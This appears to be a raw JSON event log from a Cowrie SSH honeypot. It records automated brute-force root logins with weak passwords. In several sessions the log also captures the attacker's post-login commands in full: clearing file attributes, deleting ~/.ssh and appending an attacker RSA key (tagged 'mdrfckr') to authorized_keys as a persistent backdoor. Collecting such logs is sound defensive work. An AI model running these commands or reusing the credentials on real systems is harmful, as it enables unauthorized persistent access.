{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:02.271062Z","src_ip":"24.108.102.132","session":"a6367577e215"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56424,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70d4e487670","protocol":"ssh","message":"New connection: 24.108.102.132:56424 (1.2.3.4:22) [session: f70d4e487670]","sensor":"my-vps","timestamp":"2025-08-26T00:48:02.423501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:02.428815Z","src_ip":"24.108.102.132","session":"f70d4e487670"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:02.602080Z","src_ip":"24.108.102.132","session":"f70d4e487670"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:03.291013Z","src_ip":"24.108.102.132","session":"f70d4e487670"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:03.460059Z","src_ip":"24.108.102.132","session":"891948ccbfe5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:03.465422Z","src_ip":"24.108.102.132","session":"f70d4e487670"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53152,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c84b52bf421","protocol":"ssh","message":"New connection: 212.227.235.229:53152 (1.2.3.4:22) [session: 0c84b52bf421]","sensor":"my-vps","timestamp":"2025-08-26T00:48:07.685272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:07.687269Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:07.862990Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.login.success","username":"root","password":"master22","message":"login attempt [root/master22] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:08.555615Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:08.930630Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:08.931454Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:08.932773Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.106043Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:09.557710Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.558467Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.733638Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.734551Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53166,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fea7aa0f81c","protocol":"ssh","message":"New connection: 212.227.235.229:53166 (1.2.3.4:22) [session: 4fea7aa0f81c]","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.905046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:09.910781Z","src_ip":"212.227.235.229","session":"4fea7aa0f81c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:10.082133Z","src_ip":"212.227.235.229","session":"4fea7aa0f81c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:48:10.776062Z","src_ip":"212.227.235.229","session":"4fea7aa0f81c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:11.956089Z","src_ip":"212.227.235.229","session":"4fea7aa0f81c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53170,"dst_ip":"1.2.3.4","dst_port":22,"session":"f517129e4b6a","protocol":"ssh","message":"New connection: 212.227.235.229:53170 (1.2.3.4:22) [session: f517129e4b6a]","sensor":"my-vps","timestamp":"2025-08-26T00:48:12.130305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:12.131042Z","src_ip":"212.227.235.229","session":"f517129e4b6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:12.311078Z","src_ip":"212.227.235.229","session":"f517129e4b6a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:13.055403Z","src_ip":"212.227.235.229","session":"f517129e4b6a"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:13.234524Z","src_ip":"212.227.235.229","session":"0c84b52bf421"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:13.235736Z","src_ip":"212.227.235.229","session":"f517129e4b6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56742,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6e963ef2265","protocol":"ssh","message":"New connection: 212.227.235.229:56742 (1.2.3.4:22) [session: b6e963ef2265]","sensor":"my-vps","timestamp":"2025-08-26T00:48:19.918116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:19.919244Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.001624Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.login.success","username":"root","password":"A-123456","message":"login attempt [root/A-123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.370375Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:20.553663Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.554466Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.555283Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.639933Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:20.906598Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.907336Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.991808Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:20.992645Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56750,"dst_ip":"1.2.3.4","dst_port":22,"session":"eec59989fc87","protocol":"ssh","message":"New connection: 212.227.235.229:56750 (1.2.3.4:22) [session: eec59989fc87]","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.068165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.068822Z","src_ip":"212.227.235.229","session":"eec59989fc87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.146524Z","src_ip":"212.227.235.229","session":"eec59989fc87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52598,"dst_ip":"1.2.3.4","dst_port":22,"session":"52860e2e706f","protocol":"ssh","message":"New connection: 212.227.235.229:52598 (1.2.3.4:22) [session: 52860e2e706f]","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.163722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.171677Z","src_ip":"212.227.235.229","session":"52860e2e706f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.411992Z","src_ip":"212.227.235.229","session":"52860e2e706f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:48:21.498830Z","src_ip":"212.227.235.229","session":"eec59989fc87"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"admin","message":"login attempt [sammy/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T00:48:22.393823Z","src_ip":"212.227.235.229","session":"52860e2e706f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:22.578626Z","src_ip":"212.227.235.229","session":"eec59989fc87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56754,"dst_ip":"1.2.3.4","dst_port":22,"session":"a858904d0eff","protocol":"ssh","message":"New connection: 212.227.235.229:56754 (1.2.3.4:22) [session: a858904d0eff]","sensor":"my-vps","timestamp":"2025-08-26T00:48:22.654764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:22.655735Z","src_ip":"212.227.235.229","session":"a858904d0eff"}
